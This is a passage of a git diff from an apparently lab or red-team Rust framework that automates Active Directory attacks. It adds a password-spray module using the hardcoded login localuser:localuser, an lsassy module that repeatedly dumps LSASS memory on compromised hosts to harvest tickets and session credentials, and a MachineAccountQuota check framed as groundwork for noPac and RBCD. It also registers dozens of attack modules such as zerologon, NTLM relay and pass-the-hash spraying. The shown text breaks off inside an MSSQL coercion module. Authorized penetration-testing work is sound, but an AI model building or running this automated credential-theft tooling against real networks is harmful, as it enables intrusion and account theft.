collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.mark_processed(DEDUP_LOCALUSER_SPRAY, "localuser:contoso.local".into()); + let work = collect_localuser_spray_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_processed_keeps_unprocessed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state.mark_processed(DEDUP_LOCALUSER_SPRAY, "localuser:contoso.local".into()); + let work = collect_localuser_spray_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + let work = collect_localuser_spray_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "localuser:contoso.local"); + } + + #[test] + fn collect_no_credentials_needed() { + // localuser_spray does NOT require existing credentials (it uses hardcoded localuser:localuser) + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + assert!(state.credentials.is_empty()); + let work = collect_localuser_spray_work(&state); + assert_eq!(work.len(), 1); + } + + #[test] + fn dedup_key_format() { + let key = format!("localuser:{}", "contoso.local"); + assert_eq!(key, "localuser:contoso.local"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_LOCALUSER_SPRAY, "localuser_spray"); + } + + #[test] + fn payload_structure_has_correct_technique() { + let payload = json!({ + "technique": "smb_login_check", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": "localuser", + "password": "localuser", + "domain": "contoso.local", + }, + }); + assert_eq!(payload["technique"], "smb_login_check"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["credential"]["username"], "localuser"); + assert_eq!(payload["credential"]["password"], "localuser"); + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let work = LocaluserWork { + dedup_key: "localuser:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.dedup_key, "localuser:contoso.local"); + } + + #[test] + fn no_credentials_needed_in_work_struct() { + // LocaluserWork does not carry a credential -- it uses hardcoded localuser:localuser + let work = LocaluserWork { + dedup_key: "localuser:fabrikam.local".into(), + domain: "fabrikam.local".into(), + dc_ip: "192.168.58.20".into(), + }; + assert_eq!(work.domain, "fabrikam.local"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("localuser:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "localuser:contoso.local"); + } + + #[test] + fn credential_uses_domain_from_target() { + let domain = "contoso.local"; + let payload = json!({ + "credential": { + "username": "localuser", + "password": "localuser", + "domain": domain, + }, + }); + 
assert_eq!(payload["credential"]["domain"], domain); + } + + #[test] + fn per_domain_dedup() { + let domains = ["contoso.local", "fabrikam.local"]; + let keys: Vec = domains + .iter() + .map(|d| format!("localuser:{}", d.to_lowercase())) + .collect(); + assert_eq!(keys.len(), 2); + assert_ne!(keys[0], keys[1]); + } +} diff --git a/ares-cli/src/orchestrator/automation/lsassy_dump.rs b/ares-cli/src/orchestrator/automation/lsassy_dump.rs new file mode 100644 index 00000000..b60597d5 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/lsassy_dump.rs @@ -0,0 +1,541 @@ +//! auto_lsassy_dump -- dump LSASS credentials from owned hosts via lsassy. +//! +//! After secretsdump or other lateral movement marks a host as owned, +//! this automation dispatches lsassy to dump LSASS process memory and +//! extract additional credentials (Kerberos tickets, DPAPI keys, etc.) +//! that secretsdump alone doesn't capture. +//! +//! This is complementary to secretsdump: secretsdump gets SAM/NTDS hashes, +//! while lsassy gets live session credentials from LSASS memory. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect lsassy dump work items from current state. +/// +/// Pure logic extracted from `auto_lsassy_dump` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_lsassy_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for host in &state.hosts { + // Only target hosts we've already owned (secretsdump succeeded) + if !host.owned { + continue; + } + + let dedup_key = format!("lsassy:{}", host.ip); + if state.is_processed(DEDUP_LSASSY_DUMP, &dedup_key) { + continue; + } + + // Infer domain from hostname + let domain = host + .hostname + .find('.') + .map(|i| host.hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + + // Skip when the host's domain is dominated AND every forest is fully + // owned. We still want LSASS dumps from owned hosts in a not-yet-fully- + // dominated lab (session creds may unlock cross-realm pivots), but once + // we have everything there is no point grinding more memory. + if !domain.is_empty() + && state.dominated_domains.contains(&domain) + && state.has_domain_admin + && state.all_forests_dominated() + { + continue; + } + + // Find a credential for this host's domain + let cred = state + .credentials + .iter() + .find(|c| { + !c.password.is_empty() + && (domain.is_empty() || c.domain.to_lowercase() == domain) + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .or_else(|| { + // Fall back to any admin credential + state + .credentials + .iter() + .find(|c| c.is_admin && !c.password.is_empty()) + }) + .cloned(); + + let cred = match cred { + Some(c) => c, + None => continue, + }; + + items.push(LsassyWork { + dedup_key, + host_ip: host.ip.clone(), + hostname: host.hostname.clone(), + domain, + credential: cred, + }); + } + + items +} + +/// Dumps LSASS credentials from owned hosts. +/// Interval: 45s. +pub async fn auto_lsassy_dump(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! 
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("lsassy_dump") { + info!("lsassy_dump technique not allowed — skipping"); + continue; + } + + let work = { + let state = dispatcher.state.read().await; + let owned_count = state.hosts.iter().filter(|h| h.owned).count(); + let cred_count = state.credentials.len(); + if owned_count > 0 || cred_count > 0 { + info!( + owned_hosts = owned_count, + credentials = cred_count, + "lsassy_dump tick: checking for work" + ); + } + collect_lsassy_work(&state) + }; + + if !work.is_empty() { + info!(count = work.len(), "lsassy_dump work items collected"); + } + + for item in work { + let payload = json!({ + "technique": "lsassy_dump", + "target_ip": item.host_ip, + "hostname": item.hostname, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("lsassy_dump"); + match dispatcher + .force_submit("credential_access", "credential_access", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + host = %item.host_ip, + hostname = %item.hostname, + "LSASS dump dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_LSASSY_DUMP, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_LSASSY_DUMP, &item.dedup_key) + .await; + } + Ok(None) => { + info!(host = %item.host_ip, "LSASS dump deferred by throttler"); + } + Err(e) => { + warn!(err = %e, host = %item.host_ip, "Failed to dispatch LSASS dump"); + } + } + } + } +} + +struct LsassyWork { + dedup_key: String, + host_ip: String, + hostname: String, + domain: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use ares_core::models::{Credential, Host}; + + fn make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_admin_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: true, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_owned_host(ip: &str, hostname: &str) -> Host { + Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc: false, + owned: true, + } + } + + fn make_unowned_host(ip: &str, hostname: &str) -> Host { + Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc: false, + owned: false, + } + } + + // --- collect_lsassy_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_lsassy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_owned_host("192.168.58.30", "srv01.contoso.local")); + let work = 
collect_lsassy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_unowned_host_skipped() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_unowned_host("192.168.58.30", "srv01.contoso.local")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_lsassy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_owned_host_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_owned_host("192.168.58.30", "srv01.contoso.local")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_lsassy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].host_ip, "192.168.58.30"); + assert_eq!(work[0].hostname, "srv01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dedup_key, "lsassy:192.168.58.30"); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_owned_host("192.168.58.30", "srv01.contoso.local")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_LSASSY_DUMP, "lsassy:192.168.58.30".into()); + let work = collect_lsassy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_falls_back_to_admin_credential() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_owned_host("192.168.58.30", "srv01.contoso.local")); + // Only admin cred from different domain + quarantine the matching one + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + state.credentials.push(make_admin_credential( + "domadmin", + "Admin!1", + "fabrikam.local", + )); // pragma: allowlist secret + let work = collect_lsassy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "domadmin"); + assert!(work[0].credential.is_admin); + } + + #[test] + fn collect_bare_hostname_matches_any_cred() { + let mut state = StateInner::new("test-op".into()); + state.hosts.push(make_owned_host("192.168.58.30", "ws01")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_lsassy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, ""); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_multiple_owned_hosts() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_owned_host("192.168.58.30", "srv01.contoso.local")); + state + .hosts + .push(make_owned_host("192.168.58.31", "srv02.fabrikam.local")); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_lsassy_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_quarantined_credential_skipped_with_fallback() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_owned_host("192.168.58.30", "srv01.contoso.local")); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", 
"contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("gooduser", "Pass!456", "contoso.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + let work = collect_lsassy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "gooduser"); + } + + #[test] + fn collect_skips_empty_password_credentials() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_owned_host("192.168.58.30", "srv01.contoso.local")); + state + .credentials + .push(make_credential("nopw", "", "contoso.local")); + let work = collect_lsassy_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn dedup_key_format() { + let key = format!("lsassy:{}", "192.168.58.22"); + assert_eq!(key, "lsassy:192.168.58.22"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_LSASSY_DUMP, "lsassy_dump"); + } + + #[test] + fn domain_from_hostname() { + let hostname = "dc01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn domain_from_bare_hostname() { + let hostname = "dc01"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, ""); + } + + #[test] + fn payload_structure_validation() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: true, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let payload = serde_json::json!({ + "technique": "lsassy_dump", + "target_ip": "192.168.58.22", + "hostname": "srv01.contoso.local", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + assert_eq!(payload["technique"], "lsassy_dump"); + assert_eq!(payload["target_ip"], "192.168.58.22"); + assert_eq!(payload["hostname"], "srv01.contoso.local"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "testuser".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let work = LsassyWork { + dedup_key: "lsassy:192.168.58.22".into(), + host_ip: "192.168.58.22".into(), + hostname: "srv01.contoso.local".into(), + domain: "contoso.local".into(), + credential: cred, + }; + + assert_eq!(work.dedup_key, "lsassy:192.168.58.22"); + assert_eq!(work.host_ip, "192.168.58.22"); + assert_eq!(work.hostname, "srv01.contoso.local"); + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.credential.username, "testuser"); + } + + #[test] + fn domain_extraction_from_fabrikam() { + let hostname = "sql01.fabrikam.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "fabrikam.local"); + } + + #[test] + fn dedup_key_with_various_ips() { + let ips = ["192.168.58.10", 
"192.168.58.240", "192.168.58.1"]; + for ip in &ips { + let key = format!("lsassy:{ip}"); + assert!(key.starts_with("lsassy:")); + assert!(key.ends_with(ip)); + } + } + + #[test] + fn credential_preference_admin_flag() { + let admin_cred = ares_core::models::Credential { + id: "c1".into(), + username: "domainadmin".into(), + password: "AdminPass!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: true, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let regular_cred = ares_core::models::Credential { + id: "c2".into(), + username: "user1".into(), + password: "UserPass!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let creds = [regular_cred, admin_cred]; + // Fallback logic: find admin credential + let admin = creds.iter().find(|c| c.is_admin && !c.password.is_empty()); + assert!(admin.is_some()); + assert_eq!(admin.unwrap().username, "domainadmin"); + } +} diff --git a/ares-cli/src/orchestrator/automation/machine_account_quota.rs b/ares-cli/src/orchestrator/automation/machine_account_quota.rs new file mode 100644 index 00000000..7c4b5a2e --- /dev/null +++ b/ares-cli/src/orchestrator/automation/machine_account_quota.rs @@ -0,0 +1,342 @@ +//! auto_machine_account_quota -- check MachineAccountQuota (MAQ) per domain. +//! +//! The default MAQ of 10 allows any authenticated user to create computer +//! accounts. This is a prerequisite for noPac (CVE-2021-42287) and RBCD +//! attacks. If MAQ > 0, downstream modules can proceed with machine account +//! creation-based attacks. +//! +//! Dispatches a recon check per domain to query the ms-DS-MachineAccountQuota +//! attribute from the domain root. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect MAQ work items from state (pure logic, no async). +fn collect_maq_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let dedup_key = format!("maq:{}", domain.to_lowercase()); + if state.is_processed(DEDUP_MACHINE_ACCOUNT_QUOTA, &dedup_key) { + continue; + } + + let cred = match state + .credentials + .iter() + .find(|c| c.domain.to_lowercase() == domain.to_lowercase()) + .or_else(|| state.credentials.first()) + { + Some(c) => c.clone(), + None => continue, + }; + + items.push(MaqWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + }); + } + + items +} + +/// Checks MAQ setting per domain via LDAP query. +/// Interval: 45s. +pub async fn auto_machine_account_quota( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! 
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("machine_account_quota") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_maq_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "machine_account_quota_check", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("machine_account_quota"); + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "MachineAccountQuota check dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_MACHINE_ACCOUNT_QUOTA, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup( + &dispatcher.queue, + DEDUP_MACHINE_ACCOUNT_QUOTA, + &item.dedup_key, + ) + .await; + } + Ok(None) => { + debug!(domain = %item.domain, "MAQ check deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch MAQ check"); + } + } + } + } +} + +struct MaqWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("maq:{}", "contoso.local"); + assert_eq!(key, "maq:contoso.local"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_MACHINE_ACCOUNT_QUOTA, "machine_account_quota"); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "technique": "machine_account_quota_check", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "machine_account_quota_check"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = MaqWork { + dedup_key: "maq:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.dedup_key, "maq:contoso.local"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("maq:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "maq:contoso.local"); + } + + // --- collect_maq_work tests --- + + use crate::orchestrator::state::StateInner; + + fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential { + ares_core::models::Credential { + id: uuid::Uuid::new_v4().to_string(), + 
username: username.to_string(), + password: "P@ssw0rd!".to_string(), // pragma: allowlist secret + domain: domain.to_string(), + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_produces_no_work() { + let state = StateInner::new("test".into()); + let work = collect_maq_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_produces_no_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_maq_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dc_with_matching_cred_produces_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_maq_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "maq:contoso.local"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_already_processed_dedup() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state.mark_processed(DEDUP_MACHINE_ACCOUNT_QUOTA, "maq:contoso.local".into()); + let work = collect_maq_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_falls_back_to_first_credential() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Only fabrikam cred available, should fall back to first + state + .credentials + .push(make_cred("fabuser", "fabrikam.local")); + let work = collect_maq_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fabuser"); + } + + #[test] + fn collect_multiple_domains_produces_multiple_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state + .credentials + .push(make_cred("fabadmin", "fabrikam.local")); + let work = collect_maq_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_cred("fabuser", "fabrikam.local")); + state + .credentials + .push(make_cred("conuser", "contoso.local")); + let work = collect_maq_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "conuser"); + } + + #[test] + fn collect_case_insensitive_domain_match() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_maq_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "maq:contoso.local"); + } + + #[test] + fn dedup_keys_differ_per_domain() { + let key1 = format!("maq:{}", "contoso.local"); 
+ let key2 = format!("maq:{}", "fabrikam.local"); + assert_ne!(key1, key2); + } +} diff --git a/ares-cli/src/orchestrator/automation/mod.rs b/ares-cli/src/orchestrator/automation/mod.rs index bb8cfd3a..5141a35d 100644 --- a/ares-cli/src/orchestrator/automation/mod.rs +++ b/ares-cli/src/orchestrator/automation/mod.rs @@ -13,59 +13,130 @@ //! all threading hacks since tokio tasks are truly concurrent. mod acl; +mod acl_discovery; mod adcs; mod adcs_exploitation; mod bloodhound; +mod certifried; +mod certipy_auth; mod coercion; mod crack; mod credential_access; mod credential_expansion; mod credential_reuse; +mod cross_forest_enum; +mod dacl_abuse; mod delegation; +mod dfs_coercion; +mod dns_enum; +mod domain_user_enum; +mod foreign_group_enum; mod gmsa; +mod golden_cert; mod golden_ticket; mod gpo; +mod gpp_sysvol; +mod group_enumeration; +mod krbrelayup; mod laps; +mod ldap_signing; +mod localuser_spray; +mod lsassy_dump; +mod machine_account_quota; mod mssql; +mod mssql_coercion; mod mssql_exploitation; +mod nopac; +mod ntlm_relay; +mod ntlmv1_downgrade; +mod password_policy; +mod petitpotam_unauth; +mod print_nightmare; +mod pth_spray; mod rbcd; +mod rdp_lateral; mod refresh; mod s4u; +mod searchconnector_coercion; mod secretsdump; mod shadow_credentials; +mod share_coercion; mod share_enum; mod shares; +mod sid_enumeration; +mod smb_signing; +mod smbclient_enum; +mod spooler_check; mod stall_detection; mod trust; mod unconstrained; +mod webdav_detection; +mod winrm_lateral; +mod zerologon; // Re-export all public task functions at the same paths they had before the split. pub use acl::auto_acl_chain_follow; +pub use acl_discovery::auto_acl_discovery; pub use adcs::auto_adcs_enumeration; pub use adcs_exploitation::auto_adcs_exploitation; +pub(crate) use adcs_exploitation::EXPLOITABLE_ESC_TYPES; pub use bloodhound::auto_bloodhound; +pub use certifried::auto_certifried; +pub use certipy_auth::auto_certipy_auth; pub use coercion::auto_coercion; pub use crack::auto_crack_dispatch; pub use credential_access::auto_credential_access; pub use credential_expansion::auto_credential_expansion; pub use credential_reuse::auto_credential_reuse; +pub use cross_forest_enum::auto_cross_forest_enum; +pub use dacl_abuse::auto_dacl_abuse; pub use delegation::auto_delegation_enumeration; +pub use dfs_coercion::auto_dfs_coercion; +pub use dns_enum::auto_dns_enum; +pub use domain_user_enum::auto_domain_user_enum; +pub use foreign_group_enum::auto_foreign_group_enum; pub use gmsa::auto_gmsa_extraction; +pub use golden_cert::auto_golden_cert; pub use golden_ticket::auto_golden_ticket; pub use gpo::auto_gpo_abuse; +pub use gpp_sysvol::auto_gpp_sysvol; +pub use group_enumeration::auto_group_enumeration; +pub use krbrelayup::auto_krbrelayup; pub use laps::auto_laps_extraction; +pub use ldap_signing::auto_ldap_signing; +pub use localuser_spray::auto_localuser_spray; +pub use lsassy_dump::auto_lsassy_dump; +pub use machine_account_quota::auto_machine_account_quota; pub use mssql::auto_mssql_detection; +pub use mssql_coercion::auto_mssql_coercion; pub use mssql_exploitation::auto_mssql_exploitation; +pub use nopac::auto_nopac; +pub use ntlm_relay::auto_ntlm_relay; +pub use ntlmv1_downgrade::auto_ntlmv1_downgrade; +pub use password_policy::auto_password_policy; +pub use petitpotam_unauth::auto_petitpotam_unauth; +pub use print_nightmare::auto_print_nightmare; +pub use pth_spray::auto_pth_spray; pub use rbcd::auto_rbcd_exploitation; +pub use rdp_lateral::auto_rdp_lateral; pub use refresh::state_refresh; pub use 
s4u::auto_s4u_exploitation;
+pub use searchconnector_coercion::auto_searchconnector_coercion;
 pub use secretsdump::auto_local_admin_secretsdump;
 pub use shadow_credentials::auto_shadow_credentials;
+pub use share_coercion::auto_share_coercion;
 pub use share_enum::auto_share_enumeration;
 pub use shares::auto_share_spider;
+pub use sid_enumeration::auto_sid_enumeration;
+pub use smb_signing::auto_smb_signing_detection;
+pub use smbclient_enum::auto_smbclient_enum;
+pub use spooler_check::auto_spooler_check;
 pub use stall_detection::auto_stall_detection;
 pub use trust::auto_trust_follow;
 pub use unconstrained::auto_unconstrained_exploitation;
+pub use webdav_detection::auto_webdav_detection;
+pub use winrm_lateral::auto_winrm_lateral;
+pub use zerologon::auto_zerologon;
 
 pub(crate) fn crack_dedup_key(hash: &ares_core::models::Hash) -> String {
     let prefix = &hash.hash_value[..32.min(hash.hash_value.len())];
diff --git a/ares-cli/src/orchestrator/automation/mssql_coercion.rs b/ares-cli/src/orchestrator/automation/mssql_coercion.rs
new file mode 100644
index 00000000..a9e9fbfa
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/mssql_coercion.rs
@@ -0,0 +1,698 @@
+//! auto_mssql_coercion -- coerce NTLM authentication from MSSQL servers via
+//! xp_dirtree/xp_fileexist.
+//!
+//! When we have MSSQL access (discovered by `auto_mssql_detection`) and a
+//! listener IP, we can force the SQL Server service account to authenticate
+//! back to our listener, capturing its NTLMv2 hash for cracking or relay.
+//!
+//! This is distinct from the general `auto_coercion` module which uses
+//! PetitPotam/PrinterBug against DCs.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
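+// Editor's note -- a minimal sketch, assuming the worker drives plain T-SQL:
+// the dispatched task presumably reduces to a UNC probe like the one below,
+// where xp_dirtree/xp_fileexist make the SQL Server service account touch our
+// listener and complete an NTLM handshake. `xp_dirtree_probe` is illustrative
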